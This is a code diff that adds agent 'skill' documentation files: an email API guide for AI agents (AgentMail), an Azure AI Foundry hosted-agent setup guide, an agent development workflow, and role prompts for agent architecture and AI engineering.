- Use AgentFolio to find similar agents and features.
|
||||
- Extract 3–5 concrete patterns you want to emulate or avoid.
|
||||
- Translate those patterns into clear requirements for your own skill.
|
||||
|
||||
### 3) Vendor shortlisting
|
||||
|
||||
- When choosing between multiple agent vendors:
|
||||
- Use AgentFolio entries as a neutral directory.
|
||||
- Build a comparison table (columns: capabilities, integrations, pricing, trust & security).
|
||||
- Use that table to drive a more formal evaluation or proof-of-concept.
|
||||
|
||||
## Example Prompts
|
||||
|
||||
Use these prompts when working with this skill in an AI coding agent:
|
||||
|
||||
- “Use AgentFolio to find 3 autonomous AI agents focused on code review. For each, summarize the core value prop, supported languages, and how they integrate into developer workflows.”
|
||||
- “Scan AgentFolio for agents that help with customer support triage. List the top options, their target customer size (SMB vs. enterprise), and any notable UX patterns.”
|
||||
- “Before we build our own research assistant, use AgentFolio to map existing research / analysis agents and highlight gaps we could fill.”
|
||||
|
||||
## When to Use
|
||||
|
||||
This skill is applicable when you need to **discover or compare autonomous AI agents** instead of building in a vacuum:
|
||||
|
||||
- At the start of a new agent or workflow project.
|
||||
- When evaluating vendors or tools to integrate.
|
||||
- When you want inspiration or best practices from existing agent products.
|
||||
|
||||
247
packages/llm/skills/agentmail/SKILL.md
Normal file
247
packages/llm/skills/agentmail/SKILL.md
Normal file
@ -0,0 +1,247 @@
|
||||
---
|
||||
name: agentmail
|
||||
description: Email infrastructure for AI agents. Create accounts, send/receive emails, manage webhooks, and check karma balance via the AgentMail API.
|
||||
risk: safe
|
||||
source: community
|
||||
---
|
||||
|
||||
# AgentMail — Email for AI Agents
|
||||
|
||||
AgentMail gives AI agents real email addresses (`@theagentmail.net`) with a REST API. Agents can send and receive email, sign up for services (GitHub, AWS, Slack, etc.), and get verification codes. A karma system prevents spam and keeps the shared domain's reputation high.
|
||||
|
||||
Base URL: `https://api.theagentmail.net`
|
||||
|
||||
## Quick start
|
||||
|
||||
All requests require `Authorization: Bearer am_...` header (API key from dashboard).
|
||||
|
||||
### Create an email account (-10 karma)
|
||||
|
||||
```bash
|
||||
curl -X POST https://api.theagentmail.net/v1/accounts \
|
||||
-H "Authorization: Bearer am_..." \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"address": "my-agent@theagentmail.net"}'
|
||||
```
|
||||
|
||||
Response: `{"data": {"id": "...", "address": "my-agent@theagentmail.net", "displayName": null, "createdAt": 123}}`
|
||||
|
||||
### Send email (-1 karma)
|
||||
|
||||
```bash
|
||||
curl -X POST https://api.theagentmail.net/v1/accounts/{accountId}/messages \
|
||||
-H "Authorization: Bearer am_..." \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"to": ["recipient@example.com"],
|
||||
"subject": "Hello from my agent",
|
||||
"text": "Plain text body",
|
||||
"html": "<p>Optional HTML body</p>"
|
||||
}'
|
||||
```
|
||||
|
||||
Optional fields: `cc`, `bcc` (string arrays), `inReplyTo`, `references` (strings for threading), `attachments` (array of `{filename, contentType, content}` where content is base64).
|
||||
|
||||
### Read inbox
|
||||
|
||||
```bash
|
||||
# List messages
|
||||
curl https://api.theagentmail.net/v1/accounts/{accountId}/messages \
|
||||
-H "Authorization: Bearer am_..."
|
||||
|
||||
# Get full message (with body and attachments)
|
||||
curl https://api.theagentmail.net/v1/accounts/{accountId}/messages/{messageId} \
|
||||
-H "Authorization: Bearer am_..."
|
||||
```
|
||||
|
||||
### Check karma
|
||||
|
||||
```bash
|
||||
curl https://api.theagentmail.net/v1/karma \
|
||||
-H "Authorization: Bearer am_..."
|
||||
```
|
||||
|
||||
Response: `{"data": {"balance": 90, "events": [...]}}`
|
||||
|
||||
### Register webhook (real-time inbound)
|
||||
|
||||
```bash
|
||||
curl -X POST https://api.theagentmail.net/v1/accounts/{accountId}/webhooks \
|
||||
-H "Authorization: Bearer am_..." \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"url": "https://my-agent.example.com/inbox"}'
|
||||
```
|
||||
|
||||
Webhook deliveries include two security headers:
|
||||
- `X-AgentMail-Signature` -- HMAC-SHA256 hex digest of the request body, signed with the webhook secret
|
||||
- `X-AgentMail-Timestamp` -- millisecond timestamp of when the delivery was sent
|
||||
|
||||
Verify the signature and reject requests with timestamps older than 5 minutes to prevent replay attacks:
|
||||
|
||||
```typescript
|
||||
import { createHmac } from "crypto";
|
||||
|
||||
const verifyWebhook = (body: string, signature: string, timestamp: string, secret: string) => {
|
||||
if (Date.now() - Number(timestamp) > 5 * 60 * 1000) return false;
|
||||
return createHmac("sha256", secret).update(body).digest("hex") === signature;
|
||||
};
|
||||
```
|
||||
|
||||
### Download attachment
|
||||
|
||||
```bash
|
||||
curl https://api.theagentmail.net/v1/accounts/{accountId}/messages/{messageId}/attachments/{attachmentId} \
|
||||
-H "Authorization: Bearer am_..."
|
||||
```
|
||||
|
||||
Returns `{"data": {"url": "https://signed-download-url..."}}`.
|
||||
|
||||
## Full API reference
|
||||
|
||||
| Method | Path | Description | Karma |
|
||||
|--------|------|-------------|-------|
|
||||
| POST | `/v1/accounts` | Create email account | -10 |
|
||||
| GET | `/v1/accounts` | List all accounts | |
|
||||
| GET | `/v1/accounts/:id` | Get account details | |
|
||||
| DELETE | `/v1/accounts/:id` | Delete account | +10 |
|
||||
| POST | `/v1/accounts/:id/messages` | Send email | -1 |
|
||||
| GET | `/v1/accounts/:id/messages` | List messages | |
|
||||
| GET | `/v1/accounts/:id/messages/:msgId` | Get full message | |
|
||||
| GET | `/v1/accounts/:id/messages/:msgId/attachments/:attId` | Get attachment URL | |
|
||||
| POST | `/v1/accounts/:id/webhooks` | Register webhook | |
|
||||
| GET | `/v1/accounts/:id/webhooks` | List webhooks | |
|
||||
| DELETE | `/v1/accounts/:id/webhooks/:whId` | Delete webhook | |
|
||||
| GET | `/v1/karma` | Get balance + events | |
|
||||
|
||||
## Karma system
|
||||
|
||||
Every action has a karma cost or reward:
|
||||
|
||||
| Event | Karma | Why |
|
||||
|---|---|---|
|
||||
| `money_paid` | +100 | Purchase credits |
|
||||
| `email_received` | +2 | Someone replied from a trusted domain |
|
||||
| `account_deleted` | +10 | Karma refunded when you delete an address |
|
||||
| `email_sent` | -1 | Sending costs karma |
|
||||
| `account_created` | -10 | Creating addresses costs karma |
|
||||
|
||||
**Important rules:**
|
||||
- Karma is only awarded for inbound emails from trusted providers (Gmail, Outlook, Yahoo, iCloud, ProtonMail, Fastmail, Hey, etc.). Emails from unknown/throwaway domains don't earn karma.
|
||||
- You only earn karma once per sender until the agent replies. If sender X emails you 5 times without a reply, only the first earns karma. Reply to X, and the next email from X earns karma again.
|
||||
- Deleting an account refunds the 10 karma it cost to create.
|
||||
|
||||
When karma reaches 0, sends and account creation return HTTP 402. Always check balance before operations that cost karma.
|
||||
|
||||
## TypeScript SDK
|
||||
|
||||
```typescript
|
||||
import { createClient } from "@agentmail/sdk";
|
||||
|
||||
const mail = createClient({ apiKey: "am_..." });
|
||||
|
||||
// Create account
|
||||
const account = await mail.accounts.create({
|
||||
address: "my-agent@theagentmail.net",
|
||||
});
|
||||
|
||||
// Send email
|
||||
await mail.messages.send(account.id, {
|
||||
to: ["human@example.com"],
|
||||
subject: "Hello",
|
||||
text: "Sent by an AI agent.",
|
||||
});
|
||||
|
||||
// Read inbox
|
||||
const messages = await mail.messages.list(account.id);
|
||||
const detail = await mail.messages.get(account.id, messages[0].id);
|
||||
|
||||
// Attachments
|
||||
const att = await mail.attachments.getUrl(accountId, messageId, attachmentId);
|
||||
// att.url is a signed download URL
|
||||
|
||||
// Webhooks
|
||||
await mail.webhooks.create(account.id, {
|
||||
url: "https://my-agent.example.com/inbox",
|
||||
});
|
||||
|
||||
// Karma
|
||||
const karma = await mail.karma.getBalance();
|
||||
console.log(karma.balance);
|
||||
```
|
||||
|
||||
## Error handling
|
||||
|
||||
```typescript
|
||||
import { AgentMailError } from "@agentmail/sdk";
|
||||
|
||||
try {
|
||||
await mail.messages.send(accountId, { to: ["a@b.com"], subject: "Hi", text: "Hey" });
|
||||
} catch (e) {
|
||||
if (e instanceof AgentMailError) {
|
||||
console.log(e.status); // 402, 404, 401, etc.
|
||||
console.log(e.code); // "INSUFFICIENT_KARMA", "NOT_FOUND", etc.
|
||||
console.log(e.message);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Common patterns
|
||||
|
||||
### Sign up for a service and read verification email
|
||||
|
||||
```typescript
|
||||
const account = await mail.accounts.create({
|
||||
address: "signup-bot@theagentmail.net",
|
||||
});
|
||||
|
||||
// Use the address to sign up (browser automation, API, etc.)
|
||||
|
||||
// Poll for verification email
|
||||
for (let i = 0; i < 30; i++) {
|
||||
const messages = await mail.messages.list(account.id);
|
||||
const verification = messages.find(m =>
|
||||
m.subject.toLowerCase().includes("verify") ||
|
||||
m.subject.toLowerCase().includes("confirm")
|
||||
);
|
||||
if (verification) {
|
||||
const detail = await mail.messages.get(account.id, verification.id);
|
||||
// Parse verification link/code from detail.bodyText or detail.bodyHtml
|
||||
break;
|
||||
}
|
||||
await new Promise(r => setTimeout(r, 2000));
|
||||
}
|
||||
```
|
||||
|
||||
### Send email and wait for reply
|
||||
|
||||
```typescript
|
||||
const sent = await mail.messages.send(account.id, {
|
||||
to: ["human@company.com"],
|
||||
subject: "Question about order #12345",
|
||||
text: "Can you check the status?",
|
||||
});
|
||||
|
||||
for (let i = 0; i < 60; i++) {
|
||||
const messages = await mail.messages.list(account.id);
|
||||
const reply = messages.find(m =>
|
||||
m.direction === "inbound" && m.timestamp > sent.timestamp
|
||||
);
|
||||
if (reply) {
|
||||
const detail = await mail.messages.get(account.id, reply.id);
|
||||
// Process reply
|
||||
break;
|
||||
}
|
||||
await new Promise(r => setTimeout(r, 5000));
|
||||
}
|
||||
```
|
||||
|
||||
## Types
|
||||
|
||||
```typescript
|
||||
type Account = { id: string; address: string; displayName: string | null; createdAt: number };
|
||||
type Message = { id: string; from: string; to: string[]; subject: string; direction: "inbound" | "outbound"; status: string; timestamp: number };
|
||||
type MessageDetail = Message & { cc: string[] | null; bcc: string[] | null; bodyText: string | null; bodyHtml: string | null; inReplyTo: string | null; references: string | null; attachments: AttachmentMeta[] };
|
||||
type AttachmentMeta = { id: string; filename: string; contentType: string; size: number };
|
||||
type KarmaBalance = { balance: number; events: KarmaEvent[] };
|
||||
type KarmaEvent = { id: string; type: string; amount: number; timestamp: number; metadata?: Record<string, unknown> };
|
||||
```
|
||||
326
packages/llm/skills/agents-v2-py/SKILL.md
Normal file
326
packages/llm/skills/agents-v2-py/SKILL.md
Normal file
@ -0,0 +1,326 @@
|
||||
---
|
||||
name: agents-v2-py
|
||||
description: "Build container-based Foundry Agents with Azure AI Projects SDK (ImageBasedHostedAgentDefinition). Use when creating hosted agents with custom container images in Azure AI Foundry."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Azure AI Hosted Agents (Python)
|
||||
|
||||
Build container-based hosted agents using `ImageBasedHostedAgentDefinition` from the Azure AI Projects SDK.
|
||||
|
||||
## Installation
|
||||
|
||||
```bash
|
||||
pip install azure-ai-projects>=2.0.0b3 azure-identity
|
||||
```
|
||||
|
||||
**Minimum SDK Version:** `2.0.0b3` or later required for hosted agent support.
|
||||
|
||||
## Environment Variables
|
||||
|
||||
```bash
|
||||
AZURE_AI_PROJECT_ENDPOINT=https://<resource>.services.ai.azure.com/api/projects/<project>
|
||||
```
|
||||
|
||||
## Prerequisites
|
||||
|
||||
Before creating hosted agents:
|
||||
|
||||
1. **Container Image** - Build and push to Azure Container Registry (ACR)
|
||||
2. **ACR Pull Permissions** - Grant your project's managed identity `AcrPull` role on the ACR
|
||||
3. **Capability Host** - Account-level capability host with `enablePublicHostingEnvironment=true`
|
||||
4. **SDK Version** - Ensure `azure-ai-projects>=2.0.0b3`
|
||||
|
||||
## Authentication
|
||||
|
||||
Always use `DefaultAzureCredential`:
|
||||
|
||||
```python
|
||||
from azure.identity import DefaultAzureCredential
|
||||
from azure.ai.projects import AIProjectClient
|
||||
|
||||
credential = DefaultAzureCredential()
|
||||
client = AIProjectClient(
|
||||
endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
|
||||
credential=credential
|
||||
)
|
||||
```
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### 1. Imports
|
||||
|
||||
```python
|
||||
import os
|
||||
from azure.identity import DefaultAzureCredential
|
||||
from azure.ai.projects import AIProjectClient
|
||||
from azure.ai.projects.models import (
|
||||
ImageBasedHostedAgentDefinition,
|
||||
ProtocolVersionRecord,
|
||||
AgentProtocol,
|
||||
)
|
||||
```
|
||||
|
||||
### 2. Create Hosted Agent
|
||||
|
||||
```python
|
||||
client = AIProjectClient(
|
||||
endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
|
||||
credential=DefaultAzureCredential()
|
||||
)
|
||||
|
||||
agent = client.agents.create_version(
|
||||
agent_name="my-hosted-agent",
|
||||
definition=ImageBasedHostedAgentDefinition(
|
||||
container_protocol_versions=[
|
||||
ProtocolVersionRecord(protocol=AgentProtocol.RESPONSES, version="v1")
|
||||
],
|
||||
cpu="1",
|
||||
memory="2Gi",
|
||||
image="myregistry.azurecr.io/my-agent:latest",
|
||||
tools=[{"type": "code_interpreter"}],
|
||||
environment_variables={
|
||||
"AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
|
||||
"MODEL_NAME": "gpt-4o-mini"
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
print(f"Created agent: {agent.name} (version: {agent.version})")
|
||||
```
|
||||
|
||||
### 3. List Agent Versions
|
||||
|
||||
```python
|
||||
versions = client.agents.list_versions(agent_name="my-hosted-agent")
|
||||
for version in versions:
|
||||
print(f"Version: {version.version}, State: {version.state}")
|
||||
```
|
||||
|
||||
### 4. Delete Agent Version
|
||||
|
||||
```python
|
||||
client.agents.delete_version(
|
||||
agent_name="my-hosted-agent",
|
||||
version=agent.version
|
||||
)
|
||||
```
|
||||
|
||||
## ImageBasedHostedAgentDefinition Parameters
|
||||
|
||||
| Parameter | Type | Required | Description |
|
||||
|-----------|------|----------|-------------|
|
||||
| `container_protocol_versions` | `list[ProtocolVersionRecord]` | Yes | Protocol versions the agent supports |
|
||||
| `image` | `str` | Yes | Full container image path (registry/image:tag) |
|
||||
| `cpu` | `str` | No | CPU allocation (e.g., "1", "2") |
|
||||
| `memory` | `str` | No | Memory allocation (e.g., "2Gi", "4Gi") |
|
||||
| `tools` | `list[dict]` | No | Tools available to the agent |
|
||||
| `environment_variables` | `dict[str, str]` | No | Environment variables for the container |
|
||||
|
||||
## Protocol Versions
|
||||
|
||||
The `container_protocol_versions` parameter specifies which protocols your agent supports:
|
||||
|
||||
```python
|
||||
from azure.ai.projects.models import ProtocolVersionRecord, AgentProtocol
|
||||
|
||||
# RESPONSES protocol - standard agent responses
|
||||
container_protocol_versions=[
|
||||
ProtocolVersionRecord(protocol=AgentProtocol.RESPONSES, version="v1")
|
||||
]
|
||||
```
|
||||
|
||||
**Available Protocols:**
|
||||
| Protocol | Description |
|
||||
|----------|-------------|
|
||||
| `AgentProtocol.RESPONSES` | Standard response protocol for agent interactions |
|
||||
|
||||
## Resource Allocation
|
||||
|
||||
Specify CPU and memory for your container:
|
||||
|
||||
```python
|
||||
definition=ImageBasedHostedAgentDefinition(
|
||||
container_protocol_versions=[...],
|
||||
image="myregistry.azurecr.io/my-agent:latest",
|
||||
cpu="2", # 2 CPU cores
|
||||
memory="4Gi" # 4 GiB memory
|
||||
)
|
||||
```
|
||||
|
||||
**Resource Limits:**
|
||||
| Resource | Min | Max | Default |
|
||||
|----------|-----|-----|---------|
|
||||
| CPU | 0.5 | 4 | 1 |
|
||||
| Memory | 1Gi | 8Gi | 2Gi |
|
||||
|
||||
## Tools Configuration
|
||||
|
||||
Add tools to your hosted agent:
|
||||
|
||||
### Code Interpreter
|
||||
|
||||
```python
|
||||
tools=[{"type": "code_interpreter"}]
|
||||
```
|
||||
|
||||
### MCP Tools
|
||||
|
||||
```python
|
||||
tools=[
|
||||
{"type": "code_interpreter"},
|
||||
{
|
||||
"type": "mcp",
|
||||
"server_label": "my-mcp-server",
|
||||
"server_url": "https://my-mcp-server.example.com"
|
||||
}
|
||||
]
|
||||
```
|
||||
|
||||
### Multiple Tools
|
||||
|
||||
```python
|
||||
tools=[
|
||||
{"type": "code_interpreter"},
|
||||
{"type": "file_search"},
|
||||
{
|
||||
"type": "mcp",
|
||||
"server_label": "custom-tool",
|
||||
"server_url": "https://custom-tool.example.com"
|
||||
}
|
||||
]
|
||||
```
|
||||
|
||||
## Environment Variables
|
||||
|
||||
Pass configuration to your container:
|
||||
|
||||
```python
|
||||
environment_variables={
|
||||
"AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
|
||||
"MODEL_NAME": "gpt-4o-mini",
|
||||
"LOG_LEVEL": "INFO",
|
||||
"CUSTOM_CONFIG": "value"
|
||||
}
|
||||
```
|
||||
|
||||
**Best Practice:** Never hardcode secrets. Use environment variables or Azure Key Vault.
|
||||
|
||||
## Complete Example
|
||||
|
||||
```python
|
||||
import os
|
||||
from azure.identity import DefaultAzureCredential
|
||||
from azure.ai.projects import AIProjectClient
|
||||
from azure.ai.projects.models import (
|
||||
ImageBasedHostedAgentDefinition,
|
||||
ProtocolVersionRecord,
|
||||
AgentProtocol,
|
||||
)
|
||||
|
||||
def create_hosted_agent():
|
||||
"""Create a hosted agent with custom container image."""
|
||||
|
||||
client = AIProjectClient(
|
||||
endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
|
||||
credential=DefaultAzureCredential()
|
||||
)
|
||||
|
||||
agent = client.agents.create_version(
|
||||
agent_name="data-processor-agent",
|
||||
definition=ImageBasedHostedAgentDefinition(
|
||||
container_protocol_versions=[
|
||||
ProtocolVersionRecord(
|
||||
protocol=AgentProtocol.RESPONSES,
|
||||
version="v1"
|
||||
)
|
||||
],
|
||||
image="myregistry.azurecr.io/data-processor:v1.0",
|
||||
cpu="2",
|
||||
memory="4Gi",
|
||||
tools=[
|
||||
{"type": "code_interpreter"},
|
||||
{"type": "file_search"}
|
||||
],
|
||||
environment_variables={
|
||||
"AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
|
||||
"MODEL_NAME": "gpt-4o-mini",
|
||||
"MAX_RETRIES": "3"
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
print(f"Created hosted agent: {agent.name}")
|
||||
print(f"Version: {agent.version}")
|
||||
print(f"State: {agent.state}")
|
||||
|
||||
return agent
|
||||
|
||||
if __name__ == "__main__":
|
||||
create_hosted_agent()
|
||||
```
|
||||
|
||||
## Async Pattern
|
||||
|
||||
```python
|
||||
import os
|
||||
from azure.identity.aio import DefaultAzureCredential
|
||||
from azure.ai.projects.aio import AIProjectClient
|
||||
from azure.ai.projects.models import (
|
||||
ImageBasedHostedAgentDefinition,
|
||||
ProtocolVersionRecord,
|
||||
AgentProtocol,
|
||||
)
|
||||
|
||||
async def create_hosted_agent_async():
|
||||
"""Create a hosted agent asynchronously."""
|
||||
|
||||
async with DefaultAzureCredential() as credential:
|
||||
async with AIProjectClient(
|
||||
endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
|
||||
credential=credential
|
||||
) as client:
|
||||
agent = await client.agents.create_version(
|
||||
agent_name="async-agent",
|
||||
definition=ImageBasedHostedAgentDefinition(
|
||||
container_protocol_versions=[
|
||||
ProtocolVersionRecord(
|
||||
protocol=AgentProtocol.RESPONSES,
|
||||
version="v1"
|
||||
)
|
||||
],
|
||||
image="myregistry.azurecr.io/async-agent:latest",
|
||||
cpu="1",
|
||||
memory="2Gi"
|
||||
)
|
||||
)
|
||||
return agent
|
||||
```
|
||||
|
||||
## Common Errors
|
||||
|
||||
| Error | Cause | Solution |
|
||||
|-------|-------|----------|
|
||||
| `ImagePullBackOff` | ACR pull permission denied | Grant `AcrPull` role to project's managed identity |
|
||||
| `InvalidContainerImage` | Image not found | Verify image path and tag exist in ACR |
|
||||
| `CapabilityHostNotFound` | No capability host configured | Create account-level capability host |
|
||||
| `ProtocolVersionNotSupported` | Invalid protocol version | Use `AgentProtocol.RESPONSES` with version `"v1"` |
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Version Your Images** - Use specific tags, not `latest` in production
|
||||
2. **Minimal Resources** - Start with minimum CPU/memory, scale up as needed
|
||||
3. **Environment Variables** - Use for all configuration, never hardcode
|
||||
4. **Error Handling** - Wrap agent creation in try/except blocks
|
||||
5. **Cleanup** - Delete unused agent versions to free resources
|
||||
|
||||
## Reference Links
|
||||
|
||||
- [Azure AI Projects SDK](https://pypi.org/project/azure-ai-projects/)
|
||||
- [Hosted Agents Documentation](https://learn.microsoft.com/azure/ai-services/agents/how-to/hosted-agents)
|
||||
- [Azure Container Registry](https://learn.microsoft.com/azure/container-registry/)
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
173
packages/llm/skills/ai-agent-development/SKILL.md
Normal file
173
packages/llm/skills/ai-agent-development/SKILL.md
Normal file
@ -0,0 +1,173 @@
|
||||
---
|
||||
name: ai-agent-development
|
||||
description: "AI agent development workflow for building autonomous agents, multi-agent systems, and agent orchestration with CrewAI, LangGraph, and custom agents."
|
||||
category: granular-workflow-bundle
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AI Agent Development Workflow
|
||||
|
||||
## Overview
|
||||
|
||||
Specialized workflow for building AI agents including single autonomous agents, multi-agent systems, agent orchestration, tool integration, and human-in-the-loop patterns.
|
||||
|
||||
## When to Use This Workflow
|
||||
|
||||
Use this workflow when:
|
||||
- Building autonomous AI agents
|
||||
- Creating multi-agent systems
|
||||
- Implementing agent orchestration
|
||||
- Adding tool integration to agents
|
||||
- Setting up agent memory
|
||||
|
||||
## Workflow Phases
|
||||
|
||||
### Phase 1: Agent Design
|
||||
|
||||
#### Skills to Invoke
|
||||
- `ai-agents-architect` - Agent architecture
|
||||
- `autonomous-agents` - Autonomous patterns
|
||||
|
||||
#### Actions
|
||||
1. Define agent purpose
|
||||
2. Design agent capabilities
|
||||
3. Plan tool integration
|
||||
4. Design memory system
|
||||
5. Define success metrics
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @ai-agents-architect to design AI agent architecture
|
||||
```
|
||||
|
||||
### Phase 2: Single Agent Implementation
|
||||
|
||||
#### Skills to Invoke
|
||||
- `autonomous-agent-patterns` - Agent patterns
|
||||
- `autonomous-agents` - Autonomous agents
|
||||
|
||||
#### Actions
|
||||
1. Choose agent framework
|
||||
2. Implement agent logic
|
||||
3. Add tool integration
|
||||
4. Configure memory
|
||||
5. Test agent behavior
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @autonomous-agent-patterns to implement single agent
|
||||
```
|
||||
|
||||
### Phase 3: Multi-Agent System
|
||||
|
||||
#### Skills to Invoke
|
||||
- `crewai` - CrewAI framework
|
||||
- `multi-agent-patterns` - Multi-agent patterns
|
||||
|
||||
#### Actions
|
||||
1. Define agent roles
|
||||
2. Set up agent communication
|
||||
3. Configure orchestration
|
||||
4. Implement task delegation
|
||||
5. Test coordination
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @crewai to build multi-agent system with roles
|
||||
```
|
||||
|
||||
### Phase 4: Agent Orchestration
|
||||
|
||||
#### Skills to Invoke
|
||||
- `langgraph` - LangGraph orchestration
|
||||
- `workflow-orchestration-patterns` - Orchestration
|
||||
|
||||
#### Actions
|
||||
1. Design workflow graph
|
||||
2. Implement state management
|
||||
3. Add conditional branches
|
||||
4. Configure persistence
|
||||
5. Test workflows
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @langgraph to create stateful agent workflows
|
||||
```
|
||||
|
||||
### Phase 5: Tool Integration
|
||||
|
||||
#### Skills to Invoke
|
||||
- `agent-tool-builder` - Tool building
|
||||
- `tool-design` - Tool design
|
||||
|
||||
#### Actions
|
||||
1. Identify tool needs
|
||||
2. Design tool interfaces
|
||||
3. Implement tools
|
||||
4. Add error handling
|
||||
5. Test tool usage
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @agent-tool-builder to create agent tools
|
||||
```
|
||||
|
||||
### Phase 6: Memory Systems
|
||||
|
||||
#### Skills to Invoke
|
||||
- `agent-memory-systems` - Memory architecture
|
||||
- `conversation-memory` - Conversation memory
|
||||
|
||||
#### Actions
|
||||
1. Design memory structure
|
||||
2. Implement short-term memory
|
||||
3. Set up long-term memory
|
||||
4. Add entity memory
|
||||
5. Test memory retrieval
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @agent-memory-systems to implement agent memory
|
||||
```
|
||||
|
||||
### Phase 7: Evaluation
|
||||
|
||||
#### Skills to Invoke
|
||||
- `agent-evaluation` - Agent evaluation
|
||||
- `evaluation` - AI evaluation
|
||||
|
||||
#### Actions
|
||||
1. Define evaluation criteria
|
||||
2. Create test scenarios
|
||||
3. Measure agent performance
|
||||
4. Test edge cases
|
||||
5. Iterate improvements
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @agent-evaluation to evaluate agent performance
|
||||
```
|
||||
|
||||
## Agent Architecture
|
||||
|
||||
```
|
||||
User Input -> Planner -> Agent -> Tools -> Memory -> Response
|
||||
| | | |
|
||||
Decompose LLM Core Actions Short/Long-term
|
||||
```
|
||||
|
||||
## Quality Gates
|
||||
|
||||
- [ ] Agent logic working
|
||||
- [ ] Tools integrated
|
||||
- [ ] Memory functional
|
||||
- [ ] Orchestration tested
|
||||
- [ ] Evaluation passing
|
||||
|
||||
## Related Workflow Bundles
|
||||
|
||||
- `ai-ml` - AI/ML development
|
||||
- `rag-implementation` - RAG systems
|
||||
- `workflow-automation` - Workflow patterns
|
||||
95
packages/llm/skills/ai-agents-architect/SKILL.md
Normal file
95
packages/llm/skills/ai-agents-architect/SKILL.md
Normal file
@ -0,0 +1,95 @@
|
||||
---
|
||||
name: ai-agents-architect
|
||||
description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool ..."
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AI Agents Architect
|
||||
|
||||
**Role**: AI Agent Systems Architect
|
||||
|
||||
I build AI systems that can act autonomously while remaining controllable.
|
||||
I understand that agents fail in unexpected ways - I design for graceful
|
||||
degradation and clear failure modes. I balance autonomy with oversight,
|
||||
knowing when an agent should ask for help vs proceed independently.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Agent architecture design
|
||||
- Tool and function calling
|
||||
- Agent memory systems
|
||||
- Planning and reasoning strategies
|
||||
- Multi-agent orchestration
|
||||
- Agent evaluation and debugging
|
||||
|
||||
## Requirements
|
||||
|
||||
- LLM API usage
|
||||
- Understanding of function calling
|
||||
- Basic prompt engineering
|
||||
|
||||
## Patterns
|
||||
|
||||
### ReAct Loop
|
||||
|
||||
Reason-Act-Observe cycle for step-by-step execution
|
||||
|
||||
```javascript
|
||||
- Thought: reason about what to do next
|
||||
- Action: select and invoke a tool
|
||||
- Observation: process tool result
|
||||
- Repeat until task complete or stuck
|
||||
- Include max iteration limits
|
||||
```
|
||||
|
||||
### Plan-and-Execute
|
||||
|
||||
Plan first, then execute steps
|
||||
|
||||
```javascript
|
||||
- Planning phase: decompose task into steps
|
||||
- Execution phase: execute each step
|
||||
- Replanning: adjust plan based on results
|
||||
- Separate planner and executor models possible
|
||||
```
|
||||
|
||||
### Tool Registry
|
||||
|
||||
Dynamic tool discovery and management
|
||||
|
||||
```javascript
|
||||
- Register tools with schema and examples
|
||||
- Tool selector picks relevant tools for task
|
||||
- Lazy loading for expensive tools
|
||||
- Usage tracking for optimization
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Unlimited Autonomy
|
||||
|
||||
### ❌ Tool Overload
|
||||
|
||||
### ❌ Memory Hoarding
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Agent loops without iteration limits | critical | Always set limits: |
|
||||
| Vague or incomplete tool descriptions | high | Write complete tool specs: |
|
||||
| Tool errors not surfaced to agent | high | Explicit error handling: |
|
||||
| Storing everything in agent memory | medium | Selective memory: |
|
||||
| Agent has too many tools | medium | Curate tools per task: |
|
||||
| Using multiple agents when one would work | medium | Justify multi-agent: |
|
||||
| Agent internals not logged or traceable | medium | Implement tracing: |
|
||||
| Fragile parsing of agent outputs | medium | Robust output handling: |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `rag-engineer`, `prompt-engineer`, `backend`, `mcp-builder`
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
185
packages/llm/skills/ai-engineer/SKILL.md
Normal file
185
packages/llm/skills/ai-engineer/SKILL.md
Normal file
@ -0,0 +1,185 @@
|
||||
---
|
||||
name: ai-engineer
|
||||
description: Build production-ready LLM applications, advanced RAG systems, and intelligent agents. Implements vector search, multimodal AI, agent orchestration, and enterprise AI integrations.
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
|
||||
You are an AI engineer specializing in production-grade LLM applications, generative AI systems, and intelligent agent architectures.
|
||||
|
||||
## Use this skill when
|
||||
|
||||
- Building or improving LLM features, RAG systems, or AI agents
|
||||
- Designing production AI architectures and model integration
|
||||
